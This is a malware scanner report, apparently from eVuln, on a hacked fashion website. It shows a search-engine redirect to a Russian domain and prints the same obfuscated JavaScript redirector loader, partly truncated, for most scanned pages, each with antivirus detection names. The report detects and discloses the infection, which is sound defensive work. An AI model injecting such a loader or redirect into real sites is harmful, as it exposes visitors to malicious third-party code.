Malware Scanner report for cristinavasiliky.com

Malicious/Suspicious/Total urls checked: 13/0/16

13 pages have malicious code. See details below

Blacklists: OK

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL:
->http://rebrendwhois.ru/borabora/index.php
9 websites infected. rebrendwhois.ru is marked by Google as suspicious.

The website "cristinavasiliky.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://cristinavasiliky.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: cristinavasiliky.com Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 21 Sep 2014 12:18:28 GMT Location: http://rebrendwhois.ru/borabora/index.php Server: Apache/2.0.52 (Red Hat) Content-Length: 336 Content-Type: text/html; charset=iso-8859-1	malicious

Scanned pages/files

Request	Server response	Status
http://cristinavasiliky.com/	200 OK Content-Length: 5871 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/home.php	200 OK Content-Length: 9014 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/philosophy.php	200 OK Content-Length: 9551 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/collection.php	200 OK Content-Length: 19486 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/boutiques.php	200 OK Content-Length: 10350 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/upcoming.php	200 OK Content-Length: 9641 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/press.php	200 OK Content-Length: 9461 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/contact.php	200 OK Content-Length: 8828 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/test404page.js	HTTP/1.1 302 Found Connection: close Date: Sun, 21 Sep 2014 12:18:37 GMT Location: http://rebrendwhois.ru/borabora/index.php Server: Apache/2.0.52 (Red Hat) Content-Length: 312 Content-Type: text/html; charset=iso-8859-1	malicious
http://rebrendwhois.ru/borabora/index.php	500 Can't connect to rebrendwhois.ru:80 (Bad hostname) Content-Length: 162 Content-Type: text/plain	clean
http://rebrendwhois.ru/test404page.js	500 Can't connect to rebrendwhois.ru:80 (Bad hostname) Content-Length: 162 Content-Type: text/plain	clean
http://cristinavasiliky.com/press_101.php	200 OK Content-Length: 8693 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/press_mann.php	200 OK Content-Length: 8650 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/images/fashion-mann.jpg	200 OK Content-Length: 301184 Content-Type: image/jpeg	clean
http://cristinavasiliky.com/press_accessories.php	200 OK Content-Length: 8870 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT
http://cristinavasiliky.com/press_fundraiser.php	200 OK Content-Length: 12412 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i ... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById \|\| !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();} Antivirus reports: AntiVir JS/Redirect.AC Avast JS:Redirector-IX [Trj] Ikarus Trojan.JS.Redirector Rising Trojan.Script.JS.Redirector.r nProtect Trojan.JS.Agent.EHT K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.EHT (B) Comodo TrojWare.JS.Agent.AC Kaspersky Trojan.JS.Redirector.qe Microsoft VirTool:JS/Obfuscator.BK MicroWorld-eScan Trojan.JS.Agent.EHT Fortinet JS/Fraud.BBBK!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Redirector.ductl F-Secure Trojan.JS.Agent.EHT F-Prot JS/Redir.FN AVG JS/Redir Norman Obfuscated.CD Sophos JS/ScrLd-E GData Trojan.JS.Agent.EHT Commtouch JS/Redir.FN ESET-NOD32 JS/Kryptik.W.Gen BitDefender Trojan.JS.Agent.EHT

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cristinavasiliky.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://cristinavasiliky.com/

Result: cristinavasiliky.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for cristinavasiliky.com

Malware & Hack Repair

Website Hack Insurance

Malicious/Suspicious Redirects

Scanned pages/files

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools